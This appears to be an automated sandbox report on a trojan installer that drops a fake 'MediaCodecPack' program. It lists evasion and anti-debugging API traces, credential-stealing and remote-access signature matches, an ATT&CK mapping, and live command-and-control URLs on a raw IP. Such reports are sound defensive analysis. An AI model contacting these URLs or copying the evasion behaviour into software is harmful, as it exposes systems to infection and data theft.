                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-F7SVI.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-5965)
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- API coverage: 4.6 %
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 5104 -- Thread sleep count: 80 > 30
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 5104 -- Thread sleep time: -160000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2676 -- Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- File opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B78
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Thread delayed: delay time: 60000
                    Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003350000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW{2
                    Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003350000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3555972784.0000000000838000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- API call chain: ExitProcess graph end node (graph_0-6762)
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- API call chain: ExitProcess graph end node (graph_2-60348)
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep (graph_2-60565)
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60920C91 rdtsc 2_2_60920C91
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_00B180FE IsDebuggerPresent,2_2_00B180FE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_00B1E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_00B1E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_00B05E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,2_2_00B05E5E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_00B180E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B180E8
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_00B0E85F cpuid 2_2_00B0E85F
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- Code function: GetLocaleInfoA,0_2_0040520C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- Code function: GetLocaleInfoA,0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: GetLocaleInfoA,1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: GetLocaleInfoA,1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004585C8
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp -- Code function: 1_2_0045559C GetUserNameA,1_2_0045559C
                    Source: C:\Users\user\Desktop\newwork.exe.1.exe -- Code function: 0_2_00405CF4 GetVersionExA,0_2_00405CF4

                    Stealing of Sensitive Information

                    Source: Yara match -- File source: 00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: Process Memory Space: mediacodecpack.exe PID: 6172, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match -- File source: 00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match -- File source: Process Memory Space: mediacodecpack.exe PID: 6172, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,2_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60963143
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,2_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,2_2_6096A38C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,2_2_609254B1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6094B407
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6090F435 sqlite3_bind_parameter_index,2_2_6090F435
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,2_2_609255D4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_609255FF sqlite3_bind_text,2_2_609255FF
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,2_2_6094B54C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60925686
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,2_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,2_2_609256E5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6092562A sqlite3_bind_blob,2_2_6092562A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,2_2_60925655
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6094C64A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_609687A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,2_2_6092570B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F772
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,2_2_60925778
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6090577D sqlite3_bind_parameter_name,2_2_6090577D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6090576B sqlite3_bind_parameter_count,2_2_6090576B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_6094A894
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F883
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,2_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,2_2_6096281E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,2_2_6096583A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,2_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6094A92B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6090EAE5 sqlite3_transfer_bindings,2_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_6095FB98
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,2_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_60969D75
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe -- Code function: 2_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_6095FFB2
MITRE ATT&CK matrix, listed per tactic column (the number in parentheses is the count of matched signatures; techniques without a number are unmatched cells of the matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (2); Command and Scripting Interpreter (2); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Windows Service (5); Bootkit (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (5); Process Injection (2); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (21); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (121); Access Token Manipulation (1); Process Injection (2); Bootkit (1); Dynamic API Resolution
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (35); Security Software Discovery (151); Process Discovery (1); Virtualization/Sandbox Evasion (121); Application Window Discovery (1); System Owner/User Discovery (3); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Input Capture (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (12); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Source | Detection | Scanner | Label
newwork.exe.1.exe | 16% | ReversingLabs | Win32.Trojan.Munp

Source | Detection | Scanner | Label
C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | 100% | Joe Sandbox ML | -
C:\ProgramData\MediaCodecPack\sqlite3.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-2R56A.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-7LIEI.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NF7R8.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-R0E3S.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-RNN6Q.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy) | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | -
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b | 100% | Avira URL Cloud | malware
https://188.119.66.185/405117-2476756634-1002W= | 0% | Avira URL Cloud | safe
https://188.119.66.185/04 | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a | 100% | Avira URL Cloud | malware
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325 | 100% | Avira URL Cloud | malware
http://wonderwork.ucoz.com/ | 0% | Avira URL Cloud | safe
https://188.119.66.185/allowedCert_OS_1 | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4 | 100% | Avira URL Cloud | malware
                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
